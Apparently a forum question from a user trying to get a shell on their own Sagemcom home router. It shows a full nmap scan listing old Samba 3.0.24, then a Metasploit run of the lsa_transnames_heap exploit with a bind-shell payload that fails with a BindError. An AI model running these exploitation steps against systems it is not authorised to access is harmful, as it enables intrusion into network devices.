I'm trying to gain shell access to my home router/gateway, so I decided to use metasploit and nmap to find if there were any vulnerabilities that I could use:
[marcel@GLaDOS ~]$ sudo nmap -sS -Pn -A 192.168.2.1
Starting Nmap 7.50 ( https://nmap.org ) at 2017-06-21 14:30 EDT
Nmap scan report for mynetwork (192.168.2.1)
Host is up (0.012s latency).
Not shown: 844 closed ports, 148 filtered ports
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.55
| dns-nsid:
|_ bind.version: dnsmasq-2.55
80/tcp open http lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http lighttpd
|_http-server-header: HTTP Server
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=self-signedKey/organizationName=Sagemcom Ca/countryName=FR
| Not valid before: 2011-10-14T12:32:29
|_Not valid after: 2111-09-20T12:32:29
|_ssl-date: 2017-06-21T18:33:31+00:00; +14s from scanner time.
445/tcp open netbios-ssn Samba smbd 3.0.24 (workgroup: WORKGROUP)
1080/tcp open socks?
| fingerprint-strings:
| GenericLines, HTTPOptions, RTSPRequest, SIPOptions, Socks5:
| HTTP/1.1 200 BAD_REQUEST_400
| Server: CPE-iTrace-Server-1.7b
| Content-Type: text/html
| Transfer-Encoding: chunked
|_ Connection: close
9000/tcp open upnp TwonkyMedia UPnP (Linux 2.X.X; UPnP 1.0; pvConnect SDK 1.0)
49152/tcp open upnp Portable SDK for UPnP devices 1.6.18 (Linux 2.6.28.8; UPnP 1.0)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1080-TCP:V=7.50%I=7%D=6/21%Time=594ABB6A%P=x86_64-unknown-linux-gnu
SF:%r(GenericLines,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_400\r\nServer:\x20C
SF:PE-iTrace-Server-1\.7b\r\nContent-Type:\x20text/html\r\nTransfer-Encodi
SF:ng:\x20chunked\r\nConnection:\x20close\r\n\r\n")%r(Socks5,88,"HTTP/1\.1
SF:\x20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nCon
SF:tent-Type:\x20text/html\r\nTransfer-Encoding:\x20chunked\r\nConnection:
SF:\x20close\r\n\r\n")%r(HTTPOptions,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_4
SF:00\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nContent-Type:\x20text/html\
SF:r\nTransfer-Encoding:\x20chunked\r\nConnection:\x20close\r\n\r\n")%r(RT
SF:SPRequest,88,"HTTP/1\.1\x20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTr
SF:ace-Server-1\.7b\r\nContent-Type:\x20text/html\r\nTransfer-Encoding:\x2
SF:0chunked\r\nConnection:\x20close\r\n\r\n")%r(SIPOptions,88,"HTTP/1\.1\x
SF:20200\x20BAD_REQUEST_400\r\nServer:\x20CPE-iTrace-Server-1\.7b\r\nConte
SF:nt-Type:\x20text/html\r\nTransfer-Encoding:\x20chunked\r\nConnection:\x
SF:20close\r\n\r\n");
MAC Address: 40:F2:01:EE:09:CD (Sagemcom Broadband SAS)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.50%E=4%D=6/21%OT=53%CT=135%CU=32451%PV=Y%DS=1%DC=D%G=Y%M=40F201
OS:%TM=594ABC0C%P=x86_64-unknown-linux-gnu)SEQ(SP=C7%GCD=1%ISR=D3%TI=Z%CI=Z
OS:%TS=U)SEQ(SP=C6%GCD=1%ISR=CE%TI=Z%CI=Z%II=I%TS=U)OPS(O1=M5B4NNSNW4%O2=M5
OS:B4NNSNW4%O3=M5B4NW4%O4=M5B4NNSNW4%O5=M5B4NNSNW4%O6=M5B4NNS)WIN(W1=16D0%W
OS:2=16D0%W3=16D0%W4=16D0%W5=16D0%W6=16D0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NN
OS:SNW4%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T
OS:=40%W=16D0%S=O%A=S+%F=AS%O=M5B4NNSNW4%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A
OS:=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%D
OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel:2, cpe:/o:linux:linux_kernel:2.6.28.8
Host script results:
|_clock-skew: mean: 13s, deviation: 0s, median: 13s
|_nbstat: NetBIOS name: SAGEMCOM, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.24)
| NetBIOS computer name:
| Workgroup: WORKGROUP\x00
|_ System time: 2017-06-21T14:33:31-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: share (dangerous)
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server doesn't support SMBv2 protocol
TRACEROUTE
HOP RTT ADDRESS
1 12.11 ms mynetwork (192.168.2.1)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.68 seconds
I found out that the router is running linux and using Samba 3.0.24
, which is fairly old. I then found this metasploit exploit which I thought could work: https://www.exploit-db.com/exploits/16859/
msf > use exploit/linux/samba/lsa_transnames_heap
msf exploit(lsa_transnames_heap) > set RHOST 192.168.2.1
RHOST => 192.168.2.1
msf exploit(lsa_transnames_heap) > set payload linux/x86/shell/bind_tcp
payload => linux/x86/shell/bind_tcp
msf exploit(lsa_transnames_heap) > exploit
[*] Started bind handler
[*] 192.168.2.1:445 - Creating nop sled....
[*] 192.168.2.1:445 - Trying to exploit Samba with address 0xffffe410...
[*] 192.168.2.1:445 - Connecting to the SMB service...
[*] 192.168.2.1:445 - Binding to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc] ...
[-] 192.168.2.1:445 - Exploit failed: Rex::Proto::DCERPC::Exceptions::BindError Failed to bind. Could not bind to 12345778-1234-abcd-ef00-0123456789ab:0.0@ncacn_np:192.168.2.1[\lsarpc]
[*] Exploit completed, but no session was created.
Unfortunately, I'm getting a BindError
, and I can't seem to figure out the problem. If anybody could help me fix it or understand it further, that would be great!